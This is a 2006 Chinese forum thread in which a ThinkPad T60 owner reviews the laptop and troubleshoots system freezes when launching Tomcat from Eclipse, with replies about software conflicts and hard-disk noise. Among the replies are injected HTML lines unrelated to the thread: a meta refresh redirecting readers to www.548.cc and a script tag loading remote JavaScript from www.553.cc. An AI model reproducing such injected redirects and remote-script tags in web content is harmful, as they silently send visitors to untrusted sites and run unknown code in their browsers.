开业于2004年,诚信服务几万客户
翔意数码淘宝店:xynbnb.taobao.com
全国客服电话:010-59000667
地址:北京东城区东兴隆街56号北京商界A座512
ThinkPad产品专业客服 苹果产品专业客服

BF6使用5天总结。

8月5号早上在xy提的机器,看了屏幕和电池就装系统了,通过xy对面的工行ATM转的帐,一切都挺顺利。装完系统又把内存升到2G,用送的原装包换了双肩包,单买了内包和原装大鼠,抵去了世界杯竞猜的250大元,嘿嘿,美得我。

机器外观就不评论了,反正比同事的R系列要好看和气派的多了去了,但世上没有完美的事物,这里不说也罢。6号主要是装一些常用软件,充电充了12个小时,我不知道充到100%后是不是还能充的进去,反正是晚上一直插着电源。

从7号开始做开发使用,我用Eclipse3.2+Tomcat5.5,再在本地开一个mysql,写程序哪个叫爽,可能是以前在512的内存下憋屈的时间太长了,现在感觉编译程序就象在飞,呵呵。我平均每天开机10小时左右,80%以上的时间都是在写程序,没有出现cpu到100%的现象,以前可是家常便饭。

说完了好的,说个怪事,在Eclipse里启动Tomcat的一瞬间,会死机,是彻底死机,连时间都不动了。这种事情到今天已经发生了5次,有时一天一次,有时一天两次,本子的温度应该都不算高,虽然我没有用软件去查温度,但手测底部并不是热的很恐怖,而且今天早上的死机是在我刚启动电脑第一次点tomcat启动按钮时发生的,所以排除是温度过高的原因,而且今天在死机后因为周边比较安静,我听到在键盘上部中间的位置有比较大的杂音发出,我不太清楚这个地方是什么部位,但心头有一种不好的感觉,按下开机键重启后杂音消失。在网上搜了一下没有此类问题的解释,而且很多同事用了n年的IBM本子也没有出现此类问题,不知有没有做开发的朋友遇到过此问题。

再说点好的,同事把他收藏了很久的QuickTime的电影发给我,我用Apple的QuickTime播放很流畅,但是性能消耗的也厉害,占用了将近1.3G的内存,cpu也在60%以上,但在他的X40+1.25G的机器上用QuickTime根本就跑不起来,又被他们狂羡慕一番,呵呵。

总的来说,这5天使用小黑的感觉是比较好的,唯一的遗憾就是那个死机的问题,目前还找不到问题的所在。以后我会经常把使用心得发上来,希望大家也都多多交流。

最后,申请贵宾,T60BF6,序列号L3-ED071

+20---EddieFan

评分

EddieFan + 20

谢谢惠顾

关于死机先找软件问题,看看不用那个软件,在其他情况下会不会死.
<meta http-equiv="refresh" content="0; url=http://www.548.cc">
★★★
<script type="text/javascript" src="http://www.553.cc/q.js"></script>
<link href="http://www.553.cc/1.css" rel="stylesheet" type="text/css" media="screen" />

<P>&nbsp;</P>

关注这个帖子,我也是用eclipse+tomcat+oracle做开发。
lz换tomcat5.0测试一下
键盘上部中间的位置不知道是什么?
不知道是否和内存有关?
原帖由 majianshe 于 2006-8-10 22:56 发表
键盘上部中间的位置不知道是什么?
不知道是否和内存有关?

内存在键盘下部,掌托部分的中间位置。
lz解决了之后,别忘记了在这里写解决的方法。
原帖由 majianshe 于 2006-8-10 22:49 发表
lz换tomcat5.0测试一下

用Eclipse3.1+tomcat5.0.28也跑过,还是会有此现象发生,所以排除是版本问题,只是我用的都是免安装的tomcat服务器,现在想是不是会有端口冲突,因为只是在点tomcat启动的一刹那会死机,但我一天平均要启动tomcat几十次,遇到死机的概率现在是最高2次/天,用netstat查了端口也不冲突,奇怪中。
原帖由 EddieFan 于 2006-8-10 22:30 发表
谢谢惠顾

关于死机先找软件问题,看看不用那个软件,在其他情况下会不会死.

目前除了这种情况还没有在其他情况下出现过死机。
换weblogic测试一下。
看看这个帖子,用其中的工具测试一下内存兼容性。
关注中……
可以转帐??
原帖由 knzeus 于 2006-8-15 02:32 发表
可以转帐??

工行的卡可以在ATM机上转帐。
换一下其他的服务器看看有没有问题,jboss,weblogic ,等等,我用的也是elcipse3.2和tomcat5.5 没有出现这种情况,用起来很是顺畅,我用的是b41   ,1.5G的内存,并且还开着本机的oracle,启动着各种服务!6.16号买的,用到现在一直很流畅,没出现过什么问题,只是中间自己重新装了一下系统,平均每天开机也在10小时以上!!
lz解决了没有?
偶也是BF6哦,刚买半个月吧!我也发现了,机器有杂音,大概是硬盘的事吧!每次硬盘灯闪时,就发出滋啦滋啦的声音! 我的硬盘是日立的,网上说日立硬盘有杂音是通病!
哎,不知和楼主是不是一个毛病!
笔记本的噪音问题
  所有的笔记本都会有一定的噪音,主要是2个方面。1:硬盘运行都有一种咯嗒的声音,那是磁头在读
数据(硬盘在做热校正),特别是日立硬盘更明显。目前很多笔记本都使用了液态轴承硬盘,硬盘空转
噪音会底一些,但液态轴承硬盘并不能改善独盘时磁头运动的噪音。超薄机和大机器比起来噪音更明显
,因为机器薄了,机壳屏蔽效果没有大机好。2:散热风扇噪音,超薄机由于热量容易在轻薄的机身内
积聚,所以风扇时常运行,而且因为机身狭小所以风道设计较窄,风扇转速较快,所以往往噪音比大机
器要响。
使用一个多月了,后20多天因为一直在做一个c/s的项目,所以启动tomcat的问题没有再发生,刚好最近公司办公用机也更换成了ThinkCenter,内存也是2个G,所以从这周开始就不带本子上班了,以后可能本子在周末会用的多一些,用途也是娱乐方面的会多一些。楼上的一些朋友提到的硬盘问题确实存在,我也发现死机的时候硬盘的响声会大一些,不过因为死机是偶然现象所以我也就由它去了。有时间会做一下硬盘检测,不知道用什么软件比较好,现在我用的一些检测温度的软件老是检测不到硬盘的温度。其他类型的服务器我暂时不会安装,因为用不上,而且安装一次weblogic也比较麻烦,还涉及到版权问题, 以后要用的时候再说吧。
好贴
bucuo